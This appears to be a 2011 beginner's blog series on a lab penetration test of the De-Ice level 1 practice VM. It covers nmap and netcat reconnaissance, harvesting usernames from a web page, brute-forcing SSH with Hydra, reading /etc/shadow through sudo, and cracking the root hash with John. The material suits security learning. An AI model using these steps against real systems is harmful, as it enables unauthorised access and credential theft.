Wednesday, March 30, 2011

Step 5 - Escalation; owning root

Now that we have a higher level account with aadams lets see if we can finally view the etc/shadow file




























Hmm what did I do wrong? Oh, lets try to sudo first and see if that works




























There it is. The password for root. Pretty clear isnt it? Wait, its encrypted. Of course. Lets take a look at the different fields in the shadow file, focusing just on root. Each field is separated by a colon :

Login name
Encrypted password
Days since Jan 1 1970 that the password was last changed
Days before password may be changed
Days after which password must be changed
Days before password is to expire that the user is warned
Days after password expires that the account is disabled
Days since Jan 1 1970 that account disabled
A reserve field

Now I copied the entire field for root and pasted it into Kate. Im sure you could download the shadow file to your attacking pc, but this was easier




























Now that I have the encrypted password for root I needed a way to decrypt it. I used John for this




























And there we go. We now have the root password for our target machine
Posted by at No comments:
Labels: ,

Step 5 - Escalation

Now that we have a user name and password we can begin working on getting root access

The first step I took was checking out the /etc/passwd file. I wanted to see what other usernames were valid and to see what other information I could gather. Lets take a look at the file






















We can see that the user accounts of aadams, bbanter and ccoffee all exist on this server. The passwd file might look a little intimidating at first but its pretty easy to break down. The first field contains the username followed by the password field. This is ually just a * as the passwords are encrypted and stored in the shadow file. The next field is a number which represents the User-ID. In our case bbanter has a UID of 1001

Next is the Group-ID. We see that bbanter and ccoffee both have a GID of 100. Notice the aadams account has a GID of 10.

After the group ID is the GECOS field which stores various user info followed by their home directory information.

 Lets try to gain access to aadams account

The first tool I used was BruteSSH






















I let BruteSSH run for awhile but I was impatient so I killed the process and tried to use THC-Hydra

When I ran hydra I had a strange output saying it couldn't connect to port 22. I later found out that hydra was running too fast and I needed to add the -T switch and specify the number of login attempts to 8 at a time or less






















I then ran into another issue with Hydra. It always quit before going through the entire wordlist and never found the password. After some research I found that Hydra version 5.9 was having a problem with its SSH module. I had to download version 6.1 to get it to work.

After installing and running version 6.1 hydra found the password in under 10 minutes

Posted by at No comments:
Labels: ,

Step 4 - Penetration

Now that we have some usernames lets see if we can bruteforce some passwords

I dont have much practice with basic shell scripting so I decided to see if I could write a basic script that would input the usernames for me and let me put in password guesses manually. Dont laugh too hard at my first attempt






















Yeah, so that one didn't work so well. Actually it didn't work at all. Heres my second attempt






















This one actually worked. Sure its ugly but it did what I wanted. Once the script was running I tried using the username as the password. Surprisingly the intern (go figure) had a weak password and used his login ID as his password

Posted by at No comments:
Labels: ,

Step 3 - Enumeration continued

We have already identified the host operating system, services and their version. What else can we find out about our target? We don't have any user names yet, how can we get those?

Lets see what web site is running on port 80


Wow, that page is ugly and hard to read. How else can we view it? Lets use wget to download the page locally then take a look at it
























Lets take a look at that index2.php page






















Hmm it looks like there are several email addresses in there. Lets try to parse them out so we can see it clearer























Great, we can see that we have emails for the system admin and other users. Lets see if we can further refine that list to just display the emails with no names or titles.






















Thats looking good. Lets output the results of our cut to a new txt file for the email id's



Great, now lets cut this file and eliminate everything after the @ sign so we can get some user names






















Next I opened this file with Kate and added the user names so the initial is first (example banterb I added bbanter)






















Now we have some user names we can use to attempt a brute force attack on our target.
Posted by at No comments:
Labels: ,

Step 3 - Enumeration

The next step in our pentest process is enumeration. During this phase we try to determine the host OS, services running and what version they are.

We already did a little bit of enumeration in my previous post using the Nmap -sV and -O options

Here are those results again




























Another great tool we can use is Netcat

Lets use netcat to connect to the apache web server running on port 80

To do this we type nc -vv TARGET PORT

After we have a connection lets pull down the HTTP header to verify the apache server info

Once connected type HEAD / HTTP/1.0 then hit the return key 2x

The results confirm that this server is running Apache version 2.055

Netcat has a ton of other useful features that we will go into later
Posted by at No comments:
Labels: ,

Step 2 - Scanning

Angry IP scan showed there are 3 active hosts on my network but it didn't identify who or what they are.

Before we go any further its important to document each step of your pentest. You can use any application you like, I chose to use the text editor Kate already installed on Back Track

One of the tools that you will use a lot is Nmap. Nmap is a free security scanner that can do everything from finding live hosts to operating system identification.

Lets run Nmap and see what shows up on my network



Just with a basic scan we can get some idea of whats on the network. Check out the .168 scan results. Notice that nmap showed port 139 netbios is running. This is a pretty clear indication that this target is a windows box.

Notice anything with the .100 target? Check out port 22. SSH, usually this indicates a *nix box

Lets run nmap with a -sS and -sV  -O for Syn, Version and OS detection




























Woops! That didn't work. I need to be Root to run nmap with those options

Lets try again just at the .100 box since this will be my first target.



























This scan shows us some  great info. We can see what version of Apache, SSH and other services are running. The scan also identified the target OS as Slax Linux

Earlier we used Angry IP Scanner to look for hosts. We can do the same thing using Nmap

Lets run Nmap with the -sn to look for hosts



























The results are the same as the Angry IP Scanner. BackTrack has several tools that do basically the same thing. Its really up to you which one you want to learn,
Posted by at No comments:
Labels: , ,

Step 1 - Footprinting

The first step in any pentest is to gather as much information about the target(s) as possible. This can be done through DNS enumeration, visiting the companies webpage, ping sweeps and other google searches.

For my lab I didn't have any google searches, or dns entries to look at so I skipped straight ahead to looking for active hosts on the target network.

Back Track has a variety of tools that can help you identify live hosts. I used Angry IP Scanner to look for hosts.

Angry IP is pretty easy to use, just put in the network range and hit go




The results show that there are 3 hosts alive on my network. I wonder what they are?
Posted by at No comments:
Labels: ,

De-Ice level 1

The next few posts will cover my first pentest of the de-ice level 1 image. I used vmware to run both the de-ice and Back Track 4 r2 images on my windows 7 box.

I set the vmware virtual machines to use Bridged networking. This allowed me to connect to the internet from my  backtrack image.

At first I had a hard time figuring out how to start networking on BT4. Initially I was setting it manually using the ifconfig eth0 xxxxx but I wanted it automated and the image to pull down an ip from my dhcp server.

To start networking on backtrack simply type /etc/init.d/networking start
Posted by at No comments:
Labels:

Wednesday, March 2, 2011

Now What?

I have been working as an admin in a data center for over 10 years now. I spent the first half of my career supporting various windows boxes working with IIS, AD and everything in between. For the last few years I have been supporting the Stratus VOS operating system and spending much more time performing in depth packet analysis on transactions for a major bank.

I've known for awhile that I wanted to transition into the security field. Not really knowing where to start I decided Id go for the easier Security + certification. After about a month of studying and lots of practice tests I took my exam. On February 28th I passed with a score of 871/900

Great! Now what
Posted by at No comments:
Subscribe to: Posts (Atom)